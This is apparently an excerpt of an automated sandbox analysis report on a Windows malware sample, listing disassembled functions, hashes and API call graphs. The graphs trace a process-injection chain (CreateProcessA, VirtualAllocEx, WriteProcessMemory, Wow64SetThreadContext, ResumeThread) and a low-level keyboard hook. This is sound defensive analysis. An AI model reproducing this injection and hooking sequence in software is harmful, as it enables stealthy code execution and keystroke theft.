                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 44749facf8b10c6a29552e2bed42d1639964f955614398ec45a0ea9fa6f162cd
                                            • Instruction ID: 4034ce669160a0283cec002132b387359cf6fb3b9c5d559c3f52bc4265649ec5
                                            • Opcode Fuzzy Hash: 44749facf8b10c6a29552e2bed42d1639964f955614398ec45a0ea9fa6f162cd
                                            • Instruction Fuzzy Hash: 393112B0D01259DFDB54DF99C984BDEBBF5AF48304F20802AE504AB3A0D7B4A945CB95
                                            Function 0693C6F0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1499 693c6f0-693c6f7 1500 693c6f8-693c78c DuplicateHandle 1499->1500 1501 693c795-693c7b2 1500->1501 1502 693c78e-693c794 1500->1502 1502->1501
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0693C77F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 9954978ab960b6d0a36ab6e1b48082e8483e8f7edfd5fb12f1f72d77108be1e5
                                            • Instruction ID: b6ec98de5d2d9c58b2ea7ad6089abd5d9363f15de0fab26edb1dfb27bcd95a03
                                            • Opcode Fuzzy Hash: 9954978ab960b6d0a36ab6e1b48082e8483e8f7edfd5fb12f1f72d77108be1e5
                                            • Instruction Fuzzy Hash: 8921E5B59003589FDB10CFAAD984ADEBFF9EB48310F14801AE919A7350D379A944CFA5
                                            Function 0693FE21 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1505 693fe21-693fe72 1508 693fe74-693fe7c 1505->1508 1509 693fe7e-693feb0 SetWindowsHookExA 1505->1509 1508->1509 1510 693feb2-693feb8 1509->1510 1511 693feb9-693fed9 1509->1511 1510->1511
                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0693FC90,00000000,00000000), ref: 0693FEA3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: e0e88d90c2084d675f6f39833de5b11a111985718d741dda78700d3ba8f1fec7
                                            • Instruction ID: 20f203d567b26bcacdcedcdfe2e23daff98700503bd4413764ce6466b6c1660a
                                            • Opcode Fuzzy Hash: e0e88d90c2084d675f6f39833de5b11a111985718d741dda78700d3ba8f1fec7
                                            • Instruction Fuzzy Hash: B82107B5D002199FCB24DF9AD844BEEBBF9EB88310F108419E419A7250C774A945CFA1
                                            Function 0693C6F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1515 693c6f8-693c78c DuplicateHandle 1516 693c795-693c7b2 1515->1516 1517 693c78e-693c794 1515->1517 1517->1516
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0693C77F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 59b14aff4e717814125fe0a3cf19cdcee06a53734680221cacdb2d59fbb4cf15
                                            • Instruction ID: bb8de3acaf371f2b430840d705c40b39b4ba9c382a3bc41a3d371b22d1306834
                                            • Opcode Fuzzy Hash: 59b14aff4e717814125fe0a3cf19cdcee06a53734680221cacdb2d59fbb4cf15
                                            • Instruction Fuzzy Hash: 8821E4B5D003589FDB10CFAAD984ADEBBF9FB48310F14801AE918A7310D378A944CFA4
                                            Function 032B7251 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1520 32b7251-32b72a2 1522 32b72aa-32b72d5 DeleteFileW 1520->1522 1523 32b72a4-32b72a7 1520->1523 1524 32b72de-32b7306 1522->1524 1525 32b72d7-32b72dd 1522->1525 1523->1522 1525->1524
                                            APIs
                                            • DeleteFileW.KERNELBASE(00000000), ref: 032B72C8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4509377804.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_32b0000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 9283b1fa9b7be148556d5f525957d392e035c70df045b2d35f2e4572ea710041
                                            • Instruction ID: d736870caefcf226cfb448a3832daedc1037dad564b3c6c9837c70d7172fe3f2
                                            • Opcode Fuzzy Hash: 9283b1fa9b7be148556d5f525957d392e035c70df045b2d35f2e4572ea710041
                                            • Instruction Fuzzy Hash: B82124B1C1065A9FCB10CFAAD945AEEFBB4FF48310F14852AD818A7240D738A945CFA5
                                            Function 032B7258 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DeleteFileW.KERNELBASE(00000000), ref: 032B72C8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4509377804.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_32b0000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 568425a2ddea5013ab150b09ab452f238954981bb2a927e1c2877b061ef66257
                                            • Instruction ID: f0e6a9848bbfd36b1a966fe23513136dc97bb3028cfb2829a8d9a934f6d2eb0f
                                            • Opcode Fuzzy Hash: 568425a2ddea5013ab150b09ab452f238954981bb2a927e1c2877b061ef66257
                                            • Instruction Fuzzy Hash: 001136B1C0065A9BCB10CF9AC544AEEFBF4EF48320F14812AD818A7240D738A944CFA5
                                            Function 06935E1C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06937956
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 96c287bc7bc9aa10f4126cdfc9a5a569d85a377548b960cfe2ff357443433cb3
                                            • Instruction ID: 6359ffcd5e07c3f6fbb4fc8eaabf500fa1b975f0477f71dc69c30a806e2a7005
                                            • Opcode Fuzzy Hash: 96c287bc7bc9aa10f4126cdfc9a5a569d85a377548b960cfe2ff357443433cb3
                                            • Instruction Fuzzy Hash: A81120B1C003598FCB10DF9AD444A9EFBF8EB49220F10856AD829BB700D378A545CFA4
                                            Function 069378EA Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06937956
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: edd779748367ab5118c9daca846ec125e9e98fa148626a6d637f483c5d0297e6
                                            • Instruction ID: 8553fbe2ebb940fe65a50819eb5aad0116032ae7bc5e4373aadbc05aa44a7cd4
                                            • Opcode Fuzzy Hash: edd779748367ab5118c9daca846ec125e9e98fa148626a6d637f483c5d0297e6
                                            • Instruction Fuzzy Hash: BE1132B5C002598FCB10CF9AC844BDEFBF8AF48214F10851AD419B7700D378A545CFA4
                                            Function 0693C304 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0693D89D), ref: 0693D927
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 67686c86f62c17d6be7790aa16dba1132564a903274f86b1dcc6302c0089d34e
                                            • Instruction ID: b0277543342e495b557a64d9e332a80a4839fcca39711e357a8d522ebaa0b55a
                                            • Opcode Fuzzy Hash: 67686c86f62c17d6be7790aa16dba1132564a903274f86b1dcc6302c0089d34e
                                            • Instruction Fuzzy Hash: B811F2B58002588FCB10DF9AD448B9EBBF8EF49324F20845AD519A7640C378A944CFA5
                                            Function 0693DBB0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0693E1E5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 72c5bf4b23973462f5a6d48fd09a9937addf6fe2b0f5e1c553b742fb91781be0
                                            • Instruction ID: b40a09c14c180470b4910e86d2b2362ee2ac5e25d77df004c4464048c15e1172
                                            • Opcode Fuzzy Hash: 72c5bf4b23973462f5a6d48fd09a9937addf6fe2b0f5e1c553b742fb91781be0
                                            • Instruction Fuzzy Hash: 5E1103B58043598FDB20DF9AD448B9EBBF8EB48314F20845AE519A7610D378A944CFA5
                                            Function 0693DBAD Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0693E1E5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 8f8c170756a23d604fbdc9445572e3db284762b4496eb280b54abee60abd143d
                                            • Instruction ID: 7d3b89e3aa64ada3ff2032be286a8103292a9984ab10f417c20693918be6da1f
                                            • Opcode Fuzzy Hash: 8f8c170756a23d604fbdc9445572e3db284762b4496eb280b54abee60abd143d
                                            • Instruction Fuzzy Hash: F71115B5900358CFDB20DF9AD845BDEBBF8EB48314F20841AE559A7710C379A944CFA5
                                            Function 0693E189 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0693E1E5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: f50baa4e547ca2fc0652937569478428059ecb8e6f20a6c3a868e27f638343d0
                                            • Instruction ID: 7ebc018ee8f23088d088c14e4a24d0db7592e087bc479ff25b80da15d3617001
                                            • Opcode Fuzzy Hash: f50baa4e547ca2fc0652937569478428059ecb8e6f20a6c3a868e27f638343d0
                                            • Instruction Fuzzy Hash: 501103B58002498FDB20DFAAD444BDEFFF8EB48324F20845AE559A7700C379A544CFA5
                                            Function 0693D8C0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0693D89D), ref: 0693D927
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 14032e8c52889568746501e9fbc370ed7262091990ffb6218cf277c69b4cb690
                                            • Instruction ID: 5902b5a3fa82db3030c24b8081b52a568933d1ee9f2a8ebffcf210b91ea9a2ee
                                            • Opcode Fuzzy Hash: 14032e8c52889568746501e9fbc370ed7262091990ffb6218cf277c69b4cb690
                                            • Instruction Fuzzy Hash: DF1112B5800289CFCB10DFAAD584BDEFBF8EF49324F20845AD559A7650C378A544CFA5
                                            Function 01ABD01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4508689179.0000000001ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1abd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33b035f2dda2c57417f20d7b460c348654635e79ca008662ece9e043b8467748
                                            • Instruction ID: 7cfdf0d617e20205d63d437f7c6a6b01217ab50d1e1faa01c2e3d86eccd4c80f
                                            • Opcode Fuzzy Hash: 33b035f2dda2c57417f20d7b460c348654635e79ca008662ece9e043b8467748
                                            • Instruction Fuzzy Hash: 34212271604280DFCB15DFA8D9C0B26BF69FB88328F24C56DD90A0B257C33AD807CA61
                                            Function 01ABD104 Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4508689179.0000000001ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1abd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f7a919193eb65c82733cb327ec9f5152f993c44c491887f61fcdfa9737d3d30
                                            • Instruction ID: 18e47ab780d2edc397692fa4b944ee01819dfc4795126709ecf6ae44f3558df4
                                            • Opcode Fuzzy Hash: 2f7a919193eb65c82733cb327ec9f5152f993c44c491887f61fcdfa9737d3d30
                                            • Instruction Fuzzy Hash: 2321C271504384EFDB05DFA8E9C4B26BF69FB84318F24C66DE9094B257C33AD446C661
                                            Function 01ABD017 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4508689179.0000000001ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1abd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: b1393a7117ee1ebebeca42e298598afde0c97d113e83e8dab53ef09530fb308f
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: 9911BE75504280CFDB12CF54D5C4B15BF61FB44328F24C6A9D84A4B657C33AD40ACB62
                                            Function 01ABD0FF Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4508689179.0000000001ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1abd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                            • Instruction ID: 6580d41bb9184c653cb3016e03631fbb1bc5038974c3ab34a21d04169efa25a2
                                            • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                            • Instruction Fuzzy Hash: E711DD75504380CFDB06CF14D9C4B15BFA1FB84218F24C6ADD8494B657C33AD44ACB52

                                            Execution Graph

                                            Execution Coverage:11.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:184
                                            Total number of Limit Nodes:9
                                            execution_graph 34967 708a558 34970 708a55c 34967->34970 34968 708a6e3 34970->34968 34971 7088904 34970->34971 34972 708a7d8 PostMessageW 34971->34972 34973 708a844 34972->34973 34973->34970 34989 12cd5c8 DuplicateHandle 34990 12cd65e 34989->34990 34991 7087e6d 34992 7087d8f 34991->34992 34993 70880b6 34992->34993 34997 7089290 34992->34997 35016 70892f6 34992->35016 35036 7089281 34992->35036 34998 70892aa 34997->34998 34999 70892b2 34998->34999 35055 7089ba7 34998->35055 35060 7089aa5 34998->35060 35066 7089864 34998->35066 35071 7089b04 34998->35071 35077 7089843 34998->35077 35082 7089ac3 34998->35082 35086 7089d23 34998->35086 35092 7089922 34998->35092 35097 7089d48 34998->35097 35103 7089c96 34998->35103 35109 7089955 34998->35109 35115 7089793 34998->35115 35121 70897d2 34998->35121 35126 7089971 34998->35126 35131 70896d0 34998->35131 35135 70897bf 34998->35135 34999->34993 35017 7089284 35016->35017 35019 70892f9 35016->35019 35018 70892b2 35017->35018 35020 7089d48 4 API calls 35017->35020 35021 7089922 2 API calls 35017->35021 35022 7089d23 4 API calls 35017->35022 35023 7089ac3 2 API calls 35017->35023 35024 7089843 2 API calls 35017->35024 35025 7089b04 4 API calls 35017->35025 35026 7089864 2 API calls 35017->35026 35027 7089aa5 4 API calls 35017->35027 35028 7089ba7 2 API calls 35017->35028 35029 70897bf 2 API calls 35017->35029 35030 70896d0 2 API calls 35017->35030 35031 7089971 2 API calls 35017->35031 35032 70897d2 2 API calls 35017->35032 35033 7089793 4 API calls 35017->35033 35034 7089955 2 API calls 35017->35034 35035 7089c96 4 API calls 35017->35035 35018->34993 35020->35018 35021->35018 35022->35018 35023->35018 35024->35018 35025->35018 35026->35018 35027->35018 35028->35018 35029->35018 35030->35018 35031->35018 35032->35018 35033->35018 35034->35018 35035->35018 35037 70892aa 35036->35037 35038 7089d48 4 API calls 35037->35038 35039 7089922 2 API calls 35037->35039 35040 7089d23 4 API calls 35037->35040 35041 7089ac3 2 API calls 35037->35041 35042 7089843 2 API calls 35037->35042 35043 7089b04 4 API calls 35037->35043 35044 7089864 2 API calls 35037->35044 35045 7089aa5 4 API calls 35037->35045 35046 7089ba7 2 API calls 35037->35046 35047 70892b2 35037->35047 35048 70897bf 2 API calls 35037->35048 35049 70896d0 2 API calls 35037->35049 35050 7089971 2 API calls 35037->35050 35051 70897d2 2 API calls 35037->35051 35052 7089793 4 API calls 35037->35052 35053 7089955 2 API calls 35037->35053 35054 7089c96 4 API calls 35037->35054 35038->35047 35039->35047 35040->35047 35041->35047 35042->35047 35043->35047 35044->35047 35045->35047 35046->35047 35047->34993 35048->35047 35049->35047 35050->35047 35051->35047 35052->35047 35053->35047 35054->35047 35056 7089bca 35055->35056 35141 70876b8 35056->35141 35145 70876b0 35056->35145 35057 708a091 35061 70899df 35060->35061 35149 7086bf8 35061->35149 35153 7086c00 35061->35153 35157 70870e8 35061->35157 35161 70870e1 35061->35161 35067 708986a 35066->35067 35068 7089728 35067->35068 35165 70875f8 35067->35165 35169 70875f1 35067->35169 35068->34999 35072 70899df 35071->35072 35073 70870e8 Wow64SetThreadContext 35072->35073 35074 70870e1 Wow64SetThreadContext 35072->35074 35075 7086bf8 ResumeThread 35072->35075 35076 7086c00 ResumeThread 35072->35076 35073->35072 35074->35072 35075->35072 35076->35072 35078 708984c 35077->35078 35080 70876b8 WriteProcessMemory 35078->35080 35081 70876b0 WriteProcessMemory 35078->35081 35079 7089903 35079->34999 35080->35079 35081->35079 35083 7089ad0 35082->35083 35173 70877a8 35083->35173 35177 70877a1 35083->35177 35087 70899df 35086->35087 35088 7086bf8 ResumeThread 35087->35088 35089 7086c00 ResumeThread 35087->35089 35090 70870e8 Wow64SetThreadContext 35087->35090 35091 70870e1 Wow64SetThreadContext 35087->35091 35088->35087 35089->35087 35090->35087 35091->35087 35093 708987b 35092->35093 35094 7089728 35093->35094 35095 70875f8 VirtualAllocEx 35093->35095 35096 70875f1 VirtualAllocEx 35093->35096 35094->34999 35095->35093 35096->35093 35098 70899df 35097->35098 35099 70870e8 Wow64SetThreadContext 35098->35099 35100 70870e1 Wow64SetThreadContext 35098->35100 35101 7086bf8 ResumeThread 35098->35101 35102 7086c00 ResumeThread 35098->35102 35099->35098 35100->35098 35101->35098 35102->35098 35104 70899df 35103->35104 35105 7086bf8 ResumeThread 35104->35105 35106 7086c00 ResumeThread 35104->35106 35107 70870e8 Wow64SetThreadContext 35104->35107 35108 70870e1 Wow64SetThreadContext 35104->35108 35105->35104 35106->35104 35107->35104 35108->35104 35110 70897e9 35109->35110 35111 7089cb6 35110->35111 35113 70876b8 WriteProcessMemory 35110->35113 35114 70876b0 WriteProcessMemory 35110->35114 35112 708978f 35112->34999 35113->35112 35114->35112 35116 70897ac 35115->35116 35117 7086bf8 ResumeThread 35116->35117 35118 7086c00 ResumeThread 35116->35118 35119 70870e8 Wow64SetThreadContext 35116->35119 35120 70870e1 Wow64SetThreadContext 35116->35120 35117->35116 35118->35116 35119->35116 35120->35116 35122 70897d8 35121->35122 35124 70876b8 WriteProcessMemory 35122->35124 35125 70876b0 WriteProcessMemory 35122->35125 35123 708978f 35123->34999 35124->35123 35125->35123 35127 708987b 35126->35127 35128 7089728 35127->35128 35129 70875f8 VirtualAllocEx 35127->35129 35130 70875f1 VirtualAllocEx 35127->35130 35128->34999 35129->35127 35130->35127 35181 7087940 35131->35181 35185 7087934 35131->35185 35136 70897cc 35135->35136 35138 7089728 35135->35138 35139 70870e8 Wow64SetThreadContext 35136->35139 35140 70870e1 Wow64SetThreadContext 35136->35140 35137 7089c83 35138->34999 35139->35137 35140->35137 35142 7087700 WriteProcessMemory 35141->35142 35144 7087757 35142->35144 35144->35057 35146 70876b8 WriteProcessMemory 35145->35146 35148 7087757 35146->35148 35148->35057 35150 7086c00 ResumeThread 35149->35150 35152 7086c71 35150->35152 35152->35061 35154 7086c40 ResumeThread 35153->35154 35156 7086c71 35154->35156 35156->35061 35158 708712d Wow64SetThreadContext 35157->35158 35160 7087175 35158->35160 35160->35061 35162 70870e8 Wow64SetThreadContext 35161->35162 35164 7087175 35162->35164 35164->35061 35166 7087638 VirtualAllocEx 35165->35166 35168 7087675 35166->35168 35168->35067 35170 70875f8 VirtualAllocEx 35169->35170 35172 7087675 35170->35172 35172->35067 35174 70877f3 ReadProcessMemory 35173->35174 35176 7087837 35174->35176 35176->35083 35178 70877a8 ReadProcessMemory 35177->35178 35180 7087837 35178->35180 35180->35083 35182 70879c9 CreateProcessA 35181->35182 35184 7087b8b 35182->35184 35186 7087940 CreateProcessA 35185->35186 35188 7087b8b 35186->35188 35188->35188 34974 12caff0 34975 12caff9 34974->34975 34979 12cb0e8 34975->34979 34984 12cb0d8 34975->34984 34976 12cafff 34980 12cb0f9 34979->34980 34981 12cb11c 34979->34981 34980->34981 34982 12cb320 GetModuleHandleW 34980->34982 34981->34976 34983 12cb34d 34982->34983 34983->34976 34985 12cb11c 34984->34985 34986 12cb0f9 34984->34986 34985->34976 34986->34985 34987 12cb320 GetModuleHandleW 34986->34987 34988 12cb34d 34987->34988 34988->34976 35189 12cd380 35190 12cd3c6 GetCurrentProcess 35189->35190 35192 12cd418 GetCurrentThread 35190->35192 35193 12cd411 35190->35193 35194 12cd44e 35192->35194 35195 12cd455 GetCurrentProcess 35192->35195 35193->35192 35194->35195 35198 12cd48b 35195->35198 35196 12cd4b3 GetCurrentThreadId 35197 12cd4e4 35196->35197 35198->35196

                                            Executed Functions

                                            Function 012CD371 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 373 12cd371-12cd378 374 12cd37a-12cd40f GetCurrentProcess 373->374 375 12cd334-12cd36f 373->375 382 12cd418-12cd44c GetCurrentThread 374->382 383 12cd411-12cd417 374->383 385 12cd44e-12cd454 382->385 386 12cd455-12cd489 GetCurrentProcess 382->386 383->382 385->386 389 12cd48b-12cd491 386->389 390 12cd492-12cd4ad call 12cd550 386->390 389->390 392 12cd4b3-12cd4e2 GetCurrentThreadId 390->392 394 12cd4eb-12cd54d 392->394 395 12cd4e4-12cd4ea 392->395 395->394
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 012CD3FE
                                            • GetCurrentThread.KERNEL32 ref: 012CD43B
                                            • GetCurrentProcess.KERNEL32 ref: 012CD478
                                            • GetCurrentThreadId.KERNEL32 ref: 012CD4D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID: 4']q
                                            • API String ID: 2063062207-1259897404
                                            • Opcode ID: 806bfca1259b97cef5c9c7fdb94f143e555ecd74d4db2f45f19242646242e778
                                            • Instruction ID: 6e3aba52437bfb5ee35c8ade3d7e7cec4fcb3e9c39d6487fdd3ddfcd10be1ac4
                                            • Opcode Fuzzy Hash: 806bfca1259b97cef5c9c7fdb94f143e555ecd74d4db2f45f19242646242e778
                                            • Instruction Fuzzy Hash: E36167B09002098FDB18DFA9D548BDEBBF5FF49304F2085A9D219A7360D739A945CBA1
                                            Function 012CD380 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 402 12cd380-12cd40f GetCurrentProcess 406 12cd418-12cd44c GetCurrentThread 402->406 407 12cd411-12cd417 402->407 408 12cd44e-12cd454 406->408 409 12cd455-12cd489 GetCurrentProcess 406->409 407->406 408->409 411 12cd48b-12cd491 409->411 412 12cd492-12cd4ad call 12cd550 409->412 411->412 414 12cd4b3-12cd4e2 GetCurrentThreadId 412->414 416 12cd4eb-12cd54d 414->416 417 12cd4e4-12cd4ea 414->417 417->416
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 012CD3FE
                                            • GetCurrentThread.KERNEL32 ref: 012CD43B
                                            • GetCurrentProcess.KERNEL32 ref: 012CD478
                                            • GetCurrentThreadId.KERNEL32 ref: 012CD4D1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 718a057b56ac07e93d2bf7dfe21e42c846f348b96315e5fb20318e5267761228
                                            • Instruction ID: f916b3eefd09ce91198f84e2eae5e9c83a6bb49c253d7e6a70b5edfddd3d4634
                                            • Opcode Fuzzy Hash: 718a057b56ac07e93d2bf7dfe21e42c846f348b96315e5fb20318e5267761228
                                            • Instruction Fuzzy Hash: 865167B09002098FDB14DFA9D548BEEFBF5EF49304F208469E219A7390D738A944CBA5
                                            Function 07087934 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
